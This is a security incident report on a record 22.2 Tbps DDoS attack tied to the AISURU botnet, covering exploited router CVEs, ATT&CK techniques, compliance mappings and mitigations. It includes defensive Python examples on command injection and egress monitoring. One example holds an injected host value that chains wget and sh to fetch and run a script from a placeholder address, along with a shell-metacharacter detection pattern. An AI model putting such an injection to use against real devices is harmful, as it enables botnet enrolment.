Executive Summary
In September 2025, Cloudflare mitigated a record-breaking Distributed Denial-of-Service (DDoS) attack that peaked at 22.2 Tbps and 10.6 billion packets per second (Bpps). The flood lasted only about 40 seconds, but at that rate a volumetric attack saturates links and, just as importantly, exhausts the per-packet processing capacity of firewalls, routers and load balancers: the packet rate, not only the bandwidth, is what pushes those devices past their limits. Prior research links recent large-scale DDoS campaigns, including those hitting Cloudflare, to the AISURU botnet, which grew on a sudden global increase in infected devices, driven in part by exploited router firmware vulnerabilities. Business impact was minimal because Cloudflare mitigated the attack rapidly, but the incident underscores the ever-increasing scale and sophistication of DDoS threats.
Record-breaking DDoS attacks are climbing in frequency and intensity, with attackers exploiting IoT vulnerabilities and leveraging formidable botnets. This surge highlights the urgent need for resilient, scalable mitigation strategies, and amplifies ongoing regulatory and industry pressure to strengthen defenses against large-scale infrastructure threats.
Why This Matters Now
This incident demonstrates that DDoS attack scale and velocity are outpacing traditional network defenses, driven by massive IoT botnets like AISURU. Organizations must rapidly adapt, as such attacks can disrupt business continuity and erode trust, even with world-leading mitigation services. The escalating arms race between attackers and defenders makes immediate investment in modern DDoS resilience and compliance essential.
Attack Path Analysis
Attackers exploited known vulnerabilities in internet-exposed edge devices (routers, IP cameras and other IoT equipment) and enrolled the compromised devices in the botnet. Privilege escalation on the devices gave the malware persistent control and allowed it to be weaponized further. Lateral movement then spread the malware to similar device types within exposed network zones, increasing the botnet's size and redundancy. Command-and-control channels were established to orchestrate and synchronize large-scale volumetric DDoS attacks; data exfiltration was not the goal, and the outbound traffic from the bots carried updates and attack instructions. The result was a highly disruptive multi-terabit-per-second DDoS attack against targeted internet infrastructure, threatening widespread service availability.
Kill Chain Progression
Initial Compromise
Description
Attackers exploited known vulnerabilities in internet-exposed routers, IP cameras, and IoT devices to gain initial access, enrolling them in the botnet.
Related CVEs
CVE-2017-5259 (CVSS 9.8)
A command injection vulnerability in Cambium Networks cnPilot routers allows remote attackers to execute arbitrary commands via crafted input.
Affected Products:
Cambium Networks cnPilot routers – all versions prior to the firmware update addressing CVE-2017-5259
Exploit Status:
exploited in the wild
CVE-2023-28771 (CVSS 9.8)
An improper error message handling flaw in the IKE packet decoder of Zyxel firewalls allows an unauthenticated remote attacker to execute OS commands by sending crafted packets to the device.
Affected Products:
Zyxel ZyWALL/USG, USG FLEX, ATP and VPN series firewalls – all versions prior to the firmware update addressing CVE-2023-28771
Exploit Status:
exploited in the wild
CVE-2023-50381 (CVSS 9.8)
A vulnerability in the Realtek Jungle SDK allows remote attackers to execute arbitrary code via crafted input.
Affected Products:
Realtek Jungle SDK – all versions prior to the firmware update addressing CVE-2023-50381
Exploit Status:
exploited in the wild
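The initial-compromise step above, a command injection in a router's management interface, shown as an added example rather than code from the page or from Cambium, Zyxel or Realtek firmware. A diagnostic "ping" handler is the classic injection point in this device class: the vulnerable builder pastes the request parameter into a shell command line, the hardened builder validates the value as an IP literal or strict hostname and hands an argv list to the process API so no shell ever parses it. The handler, the hostnames and the injected request value are constructed for illustration, and nothing is executed; the functions return the command that would run so the two forms can be compared.

```python
"""Command injection in a router diagnostic handler: vulnerable string
concatenation beside the hardened allow-list/argv form. Added example; the
handler, hostnames and injected value are constructed, not taken from the
affected vendors' firmware. No command is executed: the builders return
what *would* be run so the two forms can be compared."""
import ipaddress
import re
import shlex

# Constructed attacker input: a valid host followed by a staged download and
# execution, the usual shape of a botnet loader chain.
INJECTED_HOST = "8.8.8.8; wget http://198.51.100.7/bot.sh -O /tmp/b; sh /tmp/b"

# RFC 1123 hostname: dot-separated labels of [A-Za-z0-9-], no leading/trailing '-'.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
# Characters that let a value break out of a single shell word.
SHELL_META_RE = re.compile(r"[;&|`$<>(){}\n\r]")


def build_ping_vulnerable(host: str) -> str:
    """The bug: the request parameter is pasted into a line destined for
    system()/popen(), so shell metacharacters in it append commands."""
    return f"ping -c 3 {host}"


def validate_host(host: str) -> str:
    """Allow-list validation: accept only an IP literal or a strict hostname."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host parameter: {host!r}")


def build_ping_hardened(host: str) -> list[str]:
    """argv for subprocess.run(argv) with no shell: the validated value is a
    single argument and cannot become a second command."""
    return ["ping", "-c", "3", validate_host(host)]


def shell_commands(cmdline: str) -> list[list[str]]:
    """Tokenise like a POSIX shell and split on command separators, to show
    how many separate programs a line would launch."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&", "&&", "|", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def looks_like_injection(value: str) -> bool:
    """Cheap detection signal for request logs or WAF rules: a host parameter
    should never contain shell metacharacters."""
    return SHELL_META_RE.search(value) is not None


if __name__ == "__main__":
    print(shell_commands(build_ping_vulnerable(INJECTED_HOST)))
    print(build_ping_hardened("8.8.8.8"))
    try:
        build_ping_hardened(INJECTED_HOST)
    except ValueError as exc:
        print("hardened handler:", exc)
```

The vulnerable line expands to three separate programs (ping, wget, sh), which is exactly how a loader turns a diagnostic page into a bot enrolment; the hardened version rejects the same value before any process is spawned. The `looks_like_injection` check is a detection aid for web-server logs, not a substitute for the allow-list.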
MITRE ATT&CK® Techniques
Network Denial of Service (T1498)
Endpoint Denial of Service (T1499)
Compromise Infrastructure: Botnet (T1584.005)
Acquire Infrastructure: Botnet (T1583.005)
Exploit Public-Facing Application (T1190)
Hardware Additions (T1200)
Valid Accounts (T1078)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Implement Incident Response Procedures
Control ID: 12.10
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 10
CISA ZTMM 2.0 – Monitor Traffic for Abnormal Patterns
Control ID: Network and Environment - Proactive Monitoring
NIS2 Directive – Security Requirements for Essential and Important Entities
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
Record 22.2 Tbps DDoS attacks threaten online banking availability, requiring enhanced egress security and threat detection capabilities to maintain customer service continuity.
Internet
Massive volumetric attacks targeting infrastructure providers demand multicloud visibility, zero trust segmentation, and inline IPS protection against evolving botnet campaigns like AISURU.
E-Learning
Educational platforms face service disruption from high-volume DDoS attacks, necessitating cloud firewall protection and encrypted traffic monitoring to ensure learning accessibility.
Government Administration
Critical government services vulnerable to 10.6 Bpps packet floods require comprehensive threat detection, secure hybrid connectivity, and compliance-mapped security controls.
Sources
- Cloudflare mitigates new record-breaking 22.2 Tbps DDoS attack – https://www.bleepingcomputer.com/news/security/cloudflare-mitigates-new-record-breaking-222-tbps-ddos-attack/
- Aisuru botnet behind new record-breaking 29.7 Tbps DDoS attack – https://www.bleepingcomputer.com/news/security/aisuru-botnet-behind-new-record-breaking-297-tbps-ddos-attack/
- Aisuru Botnet Powers Record DDoS Attack Peaking at 29 Tbps – https://www.securityweek.com/aisuru-botnet-powers-record-ddos-attack-peaking-at-29-tbps/
- Aisuru botnet responsible for 29.7 Tbps DDoS attack – https://hackmag.com/news/aisuru-record
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust Segmentation, Inline Threat Detection, and Cloud Network Security Fabric controls directly reduce the ability for compromised devices to participate in DDoS botnets and limit blast radius. Microsegmentation, egress enforcement, and high-performance encrypted network controls confine lateral spread, block malicious outbound command traffic, and reduce the surface for massive DDoS attacks.
Control: Cloud Firewall (ACF)
Mitigation: Prevents inbound exploitation traffic from reaching unpatched or exposed devices.
Control: Threat Detection & Anomaly Response
Mitigation: Detects unusual privilege escalation or firmware anomaly on monitored devices.
Control: Zero Trust Segmentation
Mitigation: Restricts east-west traffic flows, inhibiting malware spread to additional assets.
Control: Egress Security & Policy Enforcement
Mitigation: Blocks unauthorized outbound traffic and detects suspicious C2 communication.
Control: Multicloud Visibility & Control
Mitigation: Enables rapid detection of unexpected outbound communications.
Mitigates or rate-limits DDoS traffic at scale with inline distributed enforcement.
Impact at a Glance
Affected Business Functions
- Network Operations
- Customer Services
- Online Transactions
Estimated downtime: 1 day
Estimated loss: $5,000,000
No data exposure reported; the primary impact was service disruption due to the volumetric DDoS attack.
Recommended Actions
Key Takeaways & Next Steps
- Deploy Zero Trust Segmentation and microsegmentation to prevent lateral malware propagation between device and workload groups.
- Enforce rigorous egress controls and FQDN filtering to block device-to-internet connections and command-and-control operations.
- Utilize Cloud Native Security Fabric for real-time detection and automated throttling of large-scale DDoS and anomalous traffic at the core and edge.
- Implement cloud firewalls with AI threat intelligence to reduce the exposed attack surface and block inbound exploitation attempts.
- Enhance visibility and anomaly response across cloud and hybrid environments with centralized control and event monitoring pipelines.
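The egress-enforcement and anomaly-detection controls listed under the CNSF mitigations and in the takeaways above, worked as an added example that is not code from the page or from any vendor product. It runs two checks over constructed flow records from an IoT/edge segment: an egress allow-list, where any connection from the segment to a destination, port and protocol not explicitly permitted is a candidate C2 or update channel for an enrolled bot, and an outbound-flood detector that buckets packets per source per second and flags devices that exceed a packets-per-second budget, which is what a compromised router or camera looks like from inside the network once it starts attacking someone else. The segment prefix, allow-list, thresholds, column format and log lines are all assumptions.

```python
"""Egress policy and outbound-flood detection for an IoT/edge segment, run
over constructed flow records. Added example; the segment, allow-list,
thresholds and the flow-log format are assumptions, not a vendor's."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Flow:
    ts: float      # epoch seconds when the flow was exported
    src: str
    dst: str
    dport: int
    proto: str     # "udp" or "tcp"
    packets: int
    octets: int


IOT_SEGMENT = ip_network("10.20.0.0/16")   # assumed camera/router VLAN
EGRESS_ALLOW = {                            # assumed (dst, port, proto) allow-list
    ("10.0.0.53", 123, "udp"),              # internal NTP
    ("10.0.0.53", 53, "udp"),               # internal DNS
    ("10.0.0.80", 443, "tcp"),              # firmware update proxy
}
PPS_BUDGET = 5_000                          # assumed per-device packets/s budget


def parse_flows(lines):
    """Parse constructed 'ts src dst dport proto packets octets' lines."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, proto, pk, oc = line.split()
        flows.append(Flow(float(ts), src, dst, int(dport), proto, int(pk), int(oc)))
    return flows


def egress_violations(flows):
    """Flows from the IoT segment to a (dst, port, proto) not on the allow-list.
    For a segment that should only ever reach NTP, DNS and the update proxy,
    every hit here is a device talking to something it was never meant to."""
    return [
        f for f in flows
        if ip_address(f.src) in IOT_SEGMENT
        and (f.dst, f.dport, f.proto) not in EGRESS_ALLOW
    ]


def outbound_floods(flows):
    """Per-source, per-second packet rate from the IoT segment. Returns
    {src: (peak_pps, avg_packet_bytes)} for sources over PPS_BUDGET; a tiny
    average packet size alongside a huge rate is the profile of a UDP flood."""
    pkts = defaultdict(int)
    octs = defaultdict(int)
    for f in flows:
        if ip_address(f.src) not in IOT_SEGMENT:
            continue
        key = (f.src, int(f.ts))          # one-second bucket
        pkts[key] += f.packets
        octs[key] += f.octets
    peak = {}
    for (src, sec), n in pkts.items():
        if n > PPS_BUDGET and (src not in peak or n > peak[src][0]):
            peak[src] = (n, round(octs[(src, sec)] / n, 1))
    return peak


# Constructed sample: 10.20.1.8 behaves, 10.20.1.7 beacons out and then floods,
# 10.30.4.4 is outside the IoT segment and is not subject to this policy.
SAMPLE = """\
# ts           src         dst           dport proto packets octets
1700000000.0   10.20.1.8   10.0.0.53     123   udp   2       180
1700000000.2   10.20.1.7   203.0.113.5   443   tcp   6       820
1700000001.0   10.20.1.7   198.51.100.9  80    udp   60000   3600000
1700000001.3   10.20.1.8   10.0.0.80     443   tcp   40      51200
1700000002.0   10.20.1.7   198.51.100.9  80    udp   58000   3480000
1700000002.5   10.30.4.4   198.51.100.9  80    tcp   30      24000
"""


def analyse(text=SAMPLE):
    """Run both checks over a flow-log text and return the findings."""
    flows = parse_flows(text.splitlines())
    return {
        "egress": [(f.src, f.dst, f.dport) for f in egress_violations(flows)],
        "floods": outbound_floods(flows),
    }


if __name__ == "__main__":
    for kind, findings in analyse().items():
        print(kind, findings)
```

The egress check fires on the beacon to 203.0.113.5:443 before the flood starts, which is the window in which blocking the device costs nothing; the flood check catches the same device a second later at 60,000 pps with 60-byte packets. In production the allow-list would be populated from the update and NTP destinations the devices legitimately need, and both findings would feed the segment's enforcement point rather than a print statement.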